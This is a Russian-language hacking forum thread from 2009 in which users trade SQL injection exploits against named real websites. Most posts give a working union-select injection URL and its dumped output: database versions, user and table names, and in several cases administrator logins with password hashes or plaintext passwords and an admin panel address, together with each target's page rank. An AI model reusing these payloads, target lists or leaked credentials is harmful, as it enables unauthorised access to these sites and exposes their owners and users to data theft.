ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9461  
Старый 21.05.2009, 23:50
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,concat_ws(version(),user(),dat abase()),4,5,6,7,8,9,10,11,12,13

babykn_babykn@localhost5.0.77-communitybabykn_babykn

http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2,13+from+information_schema.tables

pr2,тиц 210

Последний раз редактировалось AlexSatter; 21.05.2009 в 23:53..
 
Ответить с цитированием

  #9462  
Старый 22.05.2009, 00:30
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12--

5.0.67-log:u156180@10.10.227.61:u156180

http://moraru.ru/prod.php?id_product=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+information_schema.tables--
большое количество таблиц, около 300.
там нашел таблицу: b_user

http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12+from+b_user--

admin:Iq{28kX{10d8e0838e85fcc17ccd06fe9eb9af4f

PR 2, ТИЦ 10
 
Ответить с цитированием

  #9463  
Старый 22.05.2009, 00:33
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://totalshottrainer.com/content.php?id=-4+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14,15+/*+
totalsho_totalsho
 
Ответить с цитированием

  #9464  
Старый 22.05.2009, 01:08
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

[URL]: http://29r.ru
[Info]: 5.0.75-percona-highperf-b11-log:a3940_test@94.103.90.190:a3940_test
[Sploit]:
http://29r.ru/index.php?page=6_0&id=-1+union+select+1,2,3,concat_ws(0x3a,user,pwd)+from +users+--+
 
Ответить с цитированием

  #9465  
Старый 22.05.2009, 01:11
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.detki-74.ru/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

admin-3bb5029c0a7f3f6b81e744ea798e3d9d
 
Ответить с цитированием

  #9466  
Старый 22.05.2009, 09:56
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.dyadem.com/media/pr.php?id=-3909+union+selecT+1,2,3,4,concat_ws(0x3a,version() ,user(),database())

4.1.22-community-nt:darren@localhost:cms

DocumentRoot: C:\Program Files\Apache Software Foundation\Apache2.2\htdocs

PR 5, ТИЦ 10

Антибайан: checked
----------------------------
http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13

4.0.27-max-log:ecpaweb@68.178.211.7:ecpaweb

http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,usernam e,password),8,9,10,11,12,13+from+admin

sheri:monday

PR 6

Антибайан: checked

--------------------------------------------

http://www.steinerbooks.org/p.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9

4.1.22:anthroposophic@localhost:steinerbooks

PR 4
---------------------------------------------
http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6

5.0.67-community:norilsk6_mainuse@localhost:norilsk6_mika norilsk

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,table_name,3,4,5,6+from+informat ion_schema.tables

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,login,password),3 ,4,5,6+from+tab_admin

User:Password - 888:999
-------------------------------------

http://www.amadey-center.ru/razdel.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5

4.1.22-log:amadeyce_linkomp@fe43.hc.ru:wwwamadeycenterr_l inkomp

-------------------------------------
http://www.pronv.com/razdel.php?id=-7+union+selecT+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9

4.1.22-MAX-LOG:PRONV@68.178.254.62:PRONV
------------------------------------

Последний раз редактировалось AlexSatter; 22.05.2009 в 13:47..
 
Ответить с цитированием

  #9467  
Старый 22.05.2009, 13:42
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

http://www.salisburycathedral.org.uk/news.php?id=-357+unioN+seLect+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,version(),19,20,21,22,23/*
Page Rank: 5
Database Version: 4.1.20
Database name: salisburycathedral
User name: salisburycathedr@localhost
tables:
Код:
homepage
links
log
news
http://www.ihrc.org.uk/show.php?id=-1412+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13--
Database Version: 4.0.27-standard-log
Database name: db120565932
User name: dbo120565932@212.227.119.149
tables:
Код:
info
http://www.footballfoundation.com/news.php?id=-905+union+select+1,2,3,4,5,6,7--
Page Rank: 6
Database Version: 4.1.10a-log
Database name: nff
User name: nff@localhost
tables:
Код:
admin
news
http://audiobookdeals.com/audiobook-news-show.php?id=-43+union+select+1,version(),3,4--
Page Rank: 2
Database Version: 4.1.22
Database name: audioboo_content
User name: audioboo_psostre@156389-web1.sostreassoc.com
tables:
Код:
articles
news

Последний раз редактировалось satana8920; 22.05.2009 в 14:19..
 
Ответить с цитированием

  #9468  
Старый 22.05.2009, 13:47
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6

5.0.32-Debian_7etch6-log:z73749_main@77.221.130.26:z73749_main

есть таблица: psg_user, с кучей столбцов (46)

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,column_name,6+from+informat ion_schema.columns+where+table_name=0x7073675f7573 657273+limit+46,1

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,first_name,p assword),6+from+psg_users
и т.д.

------------------------------
http://www.ruriders.com/statya.php?id=-15395+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),user(),database()),8,9,10,11,12,13

5.0.77-log:m58187_uIbarbe@localhost:m58187_Ibarbero


ТИЦ 100
---------------------------------
http://www.papor.ru/statya.php?id=48+union+selecT+1,2,3,4,concat_ws(0x 3a,version(),user(),database()),6,7,8,9,10,11

5.0.70-log:dbu_ansimov_1@localhostp

тиц 10

Последний раз редактировалось AlexSatter; 22.05.2009 в 14:09..
 
Ответить с цитированием

  #9469  
Старый 22.05.2009, 16:04
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

PR 2

Цитата:
http://www.tutpricol.ru/message.php?id=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),5, 4,6,7+
adminka - http://www.tutpricol.ru/admin/
login - admin
pass - sevagin

version() - 4.1.22-log
user() - tutpric5_root@localhost
database() - tutpric5_tutpricol
 
Ответить с цитированием

  #9470  
Старый 22.05.2009, 18:08
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

PR3

Цитата:
http://www.promocamp.com/news.php?idnews=-527%20union%20select%201,concat_ws(0x3a,user(),dat abase(),version()),3,4,5,6,7,8
Код:
promocamp@localhost:promocamp:5.0.79
Tables:

Цитата:
assoc
cat
news
pr_agriturismi
pr_associazioni
pr_banner
pr_campeggi
pr_centri
pr_fiere
pr_legislazione
pr_link
pr_noleggiatori
pr_riviste
pr_sosta
prov
reg
sezioni
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ